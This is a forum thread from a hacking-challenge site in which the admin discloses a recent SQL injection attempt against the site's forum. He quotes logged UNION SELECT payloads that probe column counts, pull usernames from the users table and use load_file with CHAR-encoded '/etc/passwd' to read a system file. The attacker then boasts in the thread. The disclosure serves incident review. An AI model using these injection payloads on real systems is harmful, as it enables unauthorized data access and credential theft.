Username: 
Password: 
Restrict session to IP 

Hacking attemp

1 2
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1337
UpVotes: 886
Registered: 16y 43d




Last Seen: 19h 14m
The User is Offline
Hacking attemp
Google/translate1Thank You!1Good Post!0Bad Post! link
Today someone tried to hack around a bit Smile

The attacker was succesfully trying to inject mysql code and made forum.php behave differently.
Luckily i checked the log since a long time, just in the moment the attacker was trying to exploit it.

While the hacker tried variations of malicious input, i uploaded a patch, and checked all sql queries for similar weaknesses. (I was lucky this time ;)

If someone is interested i will post some of the injections here.

Btw: WeChall sourcecode is available wechall.zip, but not always very current.
The geeks shall inherit the properties and methods of object earth.
Global Rank: 435
Totalscore: 55762
Posts: 34
Thanks: 39
UpVotes: 18
Registered: 16y 39d

Last Seen: 14y 26d
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
I think everybody's interesting in the injections Smile
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1337
UpVotes: 886
Registered: 16y 43d




Last Seen: 19h 14m
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
This is a quote of our logfiles, IP's have been removed.

Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3%20FROM%20lol--

Error:MySqlError(1146) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3 FROM lol-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': Table 'gizmore_wechall.lol' doesn't exist.
-------------------------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3,4%20FROM%20users--

Error:MySqlError(1222) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3,4 FROM users-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': The used SELECT statements have a different number of columns.
------------------
now he was trying to guess the number of returned columns
btw: mysql errors were reported to the attacker as shown in the logs
-------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20username,username,username,username,username,username,username,username,username,username,username%20FROM%20users--

Error:MySqlError(1054) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`=alt3rn4tiv3 LIMIT 1': Unknown column 'alt3rn4tiv3' in 'where clause'.
-------------------
the one above looks really weird to me, and i am a clueless why "alt3rn4tiv3" is shown :s
------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20load_file(CHAR(47,%20101,%20116,%2099,%2047,%20112,%2097,%20115,%20115,%20119,%20100,%2047)),2,3,4,username,username,username,username,username,username,username%20FROM%20users%20WHERE%20userid%20=%2081--

Error:MySqlError(1064) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`= LIMIT 1': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1.
-----------------------------
And this one was the last for now Smile
I hope i really got lucky and no harm was caused.

Greets
Gizmore
The geeks shall inherit the properties and methods of object earth.
Global Rank: 29275
Totalscore: 0
Posts: 257
Thanks: 236
UpVotes: 173
Registered: 24y 126d
Last Seen: 0s
The User is Online
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
haha, yeah it was me Smile

the idea of a `hacking` site, vul. to SQL injections, is just very opening to the knowledge of site owners...

work on your security, before you open a hacking site, k?

here is my site: darkmindz.com, you should check it out for.. real hacking deals i guess...

anyways, keep up the good work, security, etc. and have a good day
Global Rank: 53
Totalscore: 257202
Posts: 152
Thanks: 127
UpVotes: 157
Registered: 16y 42d





Last Seen: 2d 20h
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
/me slaps Gizmore around a bit with the frozen trout
Global Rank: 73
Totalscore: 213061
Posts: 148
Thanks: 206
UpVotes: 107
Registered: 16y 42d
Kender`s Avatar



Last Seen: 2y 14d
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
@romeo: this is not a hacking site Smile
We do welcome attempts to find bugs & vulnerabilities, just let us know when you find something.

We're not professional PHP coders and can use all the help we can get..
Global Rank: 171
Totalscore: 115606
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 35d
Z`s Avatar



Last Seen: 211d 58m
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
RoMeO pwned:
http://stashbox.org/755566/antisec.txt
Last edited by Z - Jan 02, 2010 - 22:01:23
Global Rank: 122
Totalscore: 146736
Posts: 25
Thanks: 25
UpVotes: 18
Registered: 15y 141d
busyr`s Avatar


Last Seen: 144d 10h
The User is Offline
Hacking attemp
Google/translate1Thank You!1Good Post!0Bad Post! link
Nice article..
Global Rank: 348
Totalscore: 67806
Posts: 32
Thanks: 30
UpVotes: 14
Registered: 15y 69d



Last Seen: 3y 114d
The User is Offline
Hacking attemp
Google/translate1Thank You!0Good Post!1Bad Post! link
I really enjoyed reading that. Bit over the top maybe, but still, it's never so funny when you are on the recieving end, eh?
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1337
UpVotes: 886
Registered: 16y 43d




Last Seen: 19h 14m
The User is Offline
Hacking attemp
Google/translate1Thank You!1Good Post!0Bad Post! link
And funny the guy found some SQLI here and got caught by accident Drool

It was quite exciting when he was doing the injections while i was patching it, nice timing Smile

Meanwhile, wechall should be quite secure.
The geeks shall inherit the properties and methods of object earth.
1 2
tunelko, dxer, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 8616 times.